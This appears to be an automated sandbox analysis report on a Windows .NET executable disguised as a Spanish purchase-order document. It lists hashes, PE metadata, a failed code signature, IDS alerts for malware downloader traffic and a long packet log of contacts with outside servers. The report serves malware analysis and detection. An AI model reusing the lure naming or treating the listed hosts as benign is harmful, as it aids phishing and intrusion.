Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.999684482071364
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe
File size:	814'456 bytes
MD5:	fec61e105cbb213bcdb38af0dd1ec8ba
SHA1:	0fab2cecf901eac6cb0a7887e475257034aec63b
SHA256:	246922b00b01800adedac053d0dd147ec65f3438f1620b2bb6a41f28cc21d149
SHA512:	693a7ee0133017aad5aa5d11b71b8924bcd33266dd1ff48b560b000dcef2a5881460104d3eecd2b363fba5c4dfba4d207ce9e513533d888f94a1237ebe8e6b99
SSDEEP:	24576:tIwQDfhj+um6SgDM75xQ/wYmk/8pD+S1o:ZQ7hrQM1
TLSH:	9A05127F46994155C8ECCE78C72581BD7778D62B2003F7AEC8CCA5B49EA1B96CF82085
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... 'W..............................9... ...@....@.. ....................................`................................

File Icon


Icon Hash:	9b1a7a82aca38fc6

Static PE Info

General

Entrypoint:	0x4c39ce
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x14572720 [Fri Oct 24 17:19:28 1980 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft ID Verified CS AOC CA 01, O=Microsoft Corporation, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	05/03/2024 04:25:09 08/03/2024 04:25:09
Subject Chain	CN=DOTPDN LLC, O=DOTPDN LLC, L=Kirkland, S=Washington, C=US
Version:	3
Thumbprint MD5:	80F4EC7A282A787007F9370322FC85F5
Thumbprint SHA-1:	BAFBAF4F16B539C84EA65E69D1F6B34434094BA0
Thumbprint SHA-256:	AF3FAD26C3B70BDFFAAA6A9AE9066B703157E52CB5511578FB7F586E84DF3F55
Serial:	330000D001FA4427803538A45200000000D001

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc3974	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x119c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc3000	0x3d78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc19d4	0xc1a00	72943b0e9de7202176568b59087c278f	False	0.627676878227889	data	6.980086524618487	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x119c	0x1200	7af958a50284845930c14ac17df0162d	False	0.814453125	data	7.186779455355982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	fe46a3a0ff3053e903aebc81fd484516	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc40e8	0xd7f	PNG image data, 189 x 189, 8-bit/color RGBA, non-interlaced			0.9357452966714906
RT_GROUP_ICON	0xc4e68	0x14	data			1.15
RT_VERSION	0xc4e7c	0x320	data	English	United States	0.48875

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-12T21:07:43.145681+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49717	132.226.247.73	80	TCP
2024-09-12T21:07:44.426949+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49717	132.226.247.73	80	TCP
2024-09-12T21:07:45.019129+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49719	188.114.97.3	443	TCP
2024-09-12T21:07:45.898430+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49720	132.226.247.73	80	TCP
2024-09-12T21:07:47.824087+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49723	188.114.97.3	443	TCP
2024-09-12T21:07:55.788996+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49733	188.114.97.3	443	TCP
2024-09-12T21:08:01.333259+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49735	132.226.247.73	80	TCP
2024-09-12T21:08:02.348950+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49735	132.226.247.73	80	TCP
2024-09-12T21:08:02.924452+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49738	188.114.97.3	443	TCP
2024-09-12T21:08:03.661461+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49739	132.226.247.73	80	TCP
2024-09-12T21:08:05.574516+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49742	188.114.97.3	443	TCP
2024-09-12T21:08:06.867038+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49744	188.114.97.3	443	TCP
2024-09-12T21:08:10.756891+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49750	188.114.97.3	443	TCP
2024-09-12T21:08:13.333815+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49752	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 12, 2024 21:07:42.221415043 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:42.226552963 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:42.226640940 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:42.226953983 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:42.231929064 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:42.893147945 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:42.898646116 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:42.903716087 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:43.103297949 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:43.145680904 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:43.152697086 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.152729034 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:43.152787924 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.159672976 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.159713030 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:43.640791893 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:43.640928984 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.644534111 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.644556999 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:43.645016909 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:43.692567110 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.692609072 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:43.735419035 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.162890911 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.163151979 CEST	443	49718	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.163332939 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.169914961 CEST	49718	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.173209906 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:44.178904057 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:44.379055023 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:44.385082960 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.385181904 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.385283947 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.385610104 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.385644913 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.426949024 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:44.856313944 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:44.862128019 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:44.862205982 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:45.019201040 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:45.019473076 CEST	443	49719	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:45.019556046 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:45.020000935 CEST	49719	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:45.023307085 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.024383068 CEST	49720	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.028917074 CEST	80	49717	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:45.029103041 CEST	49717	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.029365063 CEST	80	49720	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:45.029447079 CEST	49720	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.029567003 CEST	49720	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.034753084 CEST	80	49720	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:45.897850037 CEST	80	49720	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:45.898430109 CEST	49720	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:45.900680065 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:45.900732994 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:45.900824070 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:45.901196003 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:45.901210070 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:45.903826952 CEST	80	49720	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:45.903897047 CEST	49720	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:46.367306948 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:46.369714975 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:46.369759083 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:46.526253939 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:46.526480913 CEST	443	49721	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:46.526549101 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:46.526974916 CEST	49721	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:46.533165932 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:46.538050890 CEST	80	49722	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:46.538153887 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:46.538378000 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:46.543224096 CEST	80	49722	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:47.212412119 CEST	80	49722	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:47.213702917 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.213774920 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.213982105 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.214143038 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.214169979 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.255125999 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.674516916 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.692564964 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.692662001 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.824176073 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.824440002 CEST	443	49723	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:47.824539900 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.824882030 CEST	49723	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:47.828670025 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.829273939 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.834140062 CEST	80	49722	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:47.834224939 CEST	49722	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.834415913 CEST	80	49724	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:47.834531069 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.834625006 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:47.839932919 CEST	80	49724	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:48.531033039 CEST	80	49724	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:48.533205986 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:48.533262968 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:48.533399105 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:48.533787966 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:48.533797026 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:48.583472013 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.002430916 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:49.005625010 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.005656004 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:49.135113001 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:49.135423899 CEST	443	49725	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:49.135561943 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.136039019 CEST	49725	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.139822960 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.140464067 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.145004034 CEST	80	49724	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:49.145107985 CEST	49724	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.145364046 CEST	80	49726	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:49.145448923 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.145601034 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:49.150461912 CEST	80	49726	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:49.949414968 CEST	80	49726	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:49.959398031 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.959495068 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:49.959585905 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.959912062 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:49.959949017 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:50.005121946 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.427722931 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:50.440534115 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:50.440596104 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:50.583766937 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:50.584012985 CEST	443	49727	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:50.584186077 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:50.584456921 CEST	49727	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:50.809041023 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.813083887 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.814454079 CEST	80	49726	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:50.814529896 CEST	49726	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.818001986 CEST	80	49728	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:50.818085909 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.818191051 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:50.823427916 CEST	80	49728	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:51.484280109 CEST	80	49728	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:51.485811949 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:51.485857010 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:51.485935926 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:51.486201048 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:51.486215115 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:51.536416054 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:51.963548899 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:51.967365980 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:51.967395067 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:52.118247032 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:52.118485928 CEST	443	49729	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:52.118571043 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:52.118901014 CEST	49729	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:52.122658968 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:52.123739958 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:52.127931118 CEST	80	49728	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:52.128036022 CEST	49728	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:52.128808022 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:52.128885984 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:52.128988981 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:52.133966923 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:53.623356104 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:53.624802113 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:53.624862909 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:53.624974012 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:53.625303984 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:53.625319958 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:53.677134037 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:53.851910114 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:53.852014065 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:53.852770090 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:53.852926970 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:53.854387999 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:53.854496002 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.322916031 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:54.325215101 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:54.325252056 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:54.486728907 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:54.486994028 CEST	443	49731	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:54.487063885 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:54.487890005 CEST	49731	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:54.492275000 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.492933035 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.497534037 CEST	80	49730	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:54.497634888 CEST	49730	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.497734070 CEST	80	49732	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:54.497816086 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.497977972 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:54.507019043 CEST	80	49732	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:55.160751104 CEST	80	49732	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:55.162935972 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.162976980 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.163110971 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.163403988 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.163413048 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.208276033 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:55.645271063 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.648735046 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.648756027 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.789015055 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.789104939 CEST	443	49733	188.114.97.3	192.168.2.9
Sep 12, 2024 21:07:55.789207935 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.789910078 CEST	49733	443	192.168.2.9	188.114.97.3
Sep 12, 2024 21:07:55.808608055 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:55.816138029 CEST	80	49732	132.226.247.73	192.168.2.9
Sep 12, 2024 21:07:55.816236019 CEST	49732	80	192.168.2.9	132.226.247.73
Sep 12, 2024 21:07:55.819550991 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:55.819596052 CEST	443	49734	149.154.167.220	192.168.2.9
Sep 12, 2024 21:07:55.819672108 CEST	49734	443	192.168.2.9	149.154.167.220
Sep 12, 2024 21:07:55.820178986 CEST	49734	443	192.168.2.9	149.154.167.220
